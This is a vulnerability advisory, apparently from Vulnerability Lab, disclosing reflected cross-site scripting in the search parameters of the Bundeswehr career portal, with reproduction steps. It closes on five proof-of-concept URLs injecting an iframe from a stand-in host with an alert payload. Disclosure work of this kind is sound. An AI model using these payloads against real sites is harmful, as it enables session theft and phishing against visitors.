Document Title: =============== Bundeswehr Karriere - Cross Site Scripting Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2214 Video: https://www.vulnerability-lab.com/get_content.php?id=2197 Release Date: ============= 2020-04-18 Vulnerability Laboratory ID (VL-ID): ==================================== 2214 Common Vulnerability Scoring System: ==================================== 4.1 Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== Als Bundeswehr bezeichnet man die Streitkräfte der Bundesrepublik Deutschland einschließlich der Bundeswehrverwaltung und weiterer Organisationsbereiche, die im Geschäftsbereich des Bundesministeriums der Verteidigung liegen. Die BWI Informationstechnik GmbH wurde 2006 von Bundeswehr, IBM und Siemens gegründet. Zusammen mit den Gesellschaften BWI Systeme GmbH und BWI Services GmbH bildet sie den BWI Leistungsverbund zur Umsetzung von Herkules, der größten öffentlich-privaten Partnerschaft in Europa. (Copy of the Homepage: https://de.wikipedia.org/wiki/Bundeswehr) (Copy of the Homepage: https://de.wikipedia.org/wiki/BWI_Informationstechnik) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core APT Research Team has identified several cross site scripting vulnerabilities in a web application of the german Bundeswehr. The Bundeswehr career portal is affected. Affected Product(s): =============== Hersteller: Bundeswehr Technology: Web-Server Produkt: Bundeswehr Karriereportal (Web-Applikation) Module: Suchmaschine - Karriere Dienstleister: BWI Vulnerability Disclosure Timeline: ================================== 2020-04-15: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Pre Auth (No Privileges or Session) User Interaction: ================= Low User Interaction Disclosure Type: ================ Coordinated Disclosure Technical Details & Description: ================================ Several non-persistent cross site scripting scripting security vulnerabilities have been discovered in the official career site of the German Armed Forces. The vulnerability type allows attackers to manipulate client-side controlled application calls. The cross site scripting vulnerabilities are located in the 'termination', 'interests', 'careers' and 'search' parameters of the 'career' module in the 'search' function. The GET method request is not cleanly cleaned up when retrieving with the vulnerable parameters. There is no validation where the request is intercepted, cleaned or filtered. As a result, attackers can submit their own malicious input to the https request to the official Bundeswehr career website. In the search, all parameters from the new page are listed and thus finally executed via the request. In the case of a successful attack, an attacker could, for example, steal session information such as cookies, generate phishing pages, identify persons with external calls, integrate client-side exploits (drive-by) or redirect to harmful web server pages. Since the web server should recognize all external sources or integrated calls, there may be a problem with the security of the SSL certificate via the Same Origin Policy. The security risk of cross site scripting vulnerabilities in the search function of the web application are considered medium. To exploit the vulnerability, an attacker does not need a web application user account, but does require light user interaction by visiting a link. Exploitation of the vulnerability results in the theft of cookie information, calling harmful external sources in the Bundeswehr web context or spear phishing attacks. Request Method(s): [+] GET Vulnerable Service(s): [+] Bundeswehr Karriere (Web-Applikation) www.bundeswehrkarriere.de Vulnerable Module(s): [+] Karriere Suche (ajax/filterlist/de/auswahl/33050/) Vulnerable Parameter(s): [+] Abschluss [+] Interessen [+] Laufbahnen [+] Suche Proof of Concept (PoC): ======================= The vulnerabilities can be exploited by attackers without a privileged user account but with light user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manuelle Schritte zum reproduzieren der Sicherheitslücke 1. Öffne die Bundeswehr Karriere Webseite Note: https://www.bundeswehrkarriere.de/karriere 2. Starte einen http/https protocol session tamper zum eingreifen in den Aufruf (live) 3. Starte eine Suche und klick auf die Lupe 4. Beim suchen fügt der Angreifer live im session tamper programm im GET method request seine payloads ein 5. Der Inhalt der Parameter wird unten in der Suche ausgegeben und führt sich direkt aus 6. Erfolgreiche Reproduktion der Sicherheitslücke! PoC: Payloads (Exploitation) https://www.bundeswehrkarriere.de/karriere#auswahl=Militaerisch/Zivil:%20%3E%22%3Ciframe%20src=evil.source%20onload=alert(%22CYBERALLIANZ%22)%3E;Abschluss:Abitur;Interessen:Fuehrung;Laufbahnen:Unteroffiziere;Suche:test https://www.bundeswehrkarriere.de/karriere#auswahl=Militaerisch/Zivil:Militaerisch;Abschluss:Abitur;Interessen:Fuehrung;Laufbahnen:%20%3E%22%3Ciframe%20src=evil.source%20onload=alert(%22CYBERALLIANZ%22)%3E;Suche:test https://www.bundeswehrkarriere.de/karriere#auswahl=Militaerisch/Zivil:Militaerisch;Abschluss:Abitur;Interessen:%20%3E%22%3Ciframe%20src=evil.source%20onload=alert(%22CYBERALLIANZ%22)%3E;Laufbahnen:Unteroffiziere;Suche:test https://www.bundeswehrkarriere.de/karriere#auswahl=Militaerisch/Zivil:Militaerisch;Abschluss:%20%3E%22%3Ciframe%20src=evil.source%20onload=alert(%22CYBERALLIANZ%22)%3E;Interessen:Fuehrung;Laufbahnen:Unteroffiziere;Suche:test https://www.bundeswehrkarriere.de/karriere#auswahl=Militaerisch/Zivil:Militaerisch;Abschluss:Abitur;Interessen:Fuehrung;Laufbahnen:Unteroffiziere;Suche:test%20%3E%22%3Ciframe%20src=evil.source%20onload=alert(%22CYBERALLIANZ%22)%3E PoC: Source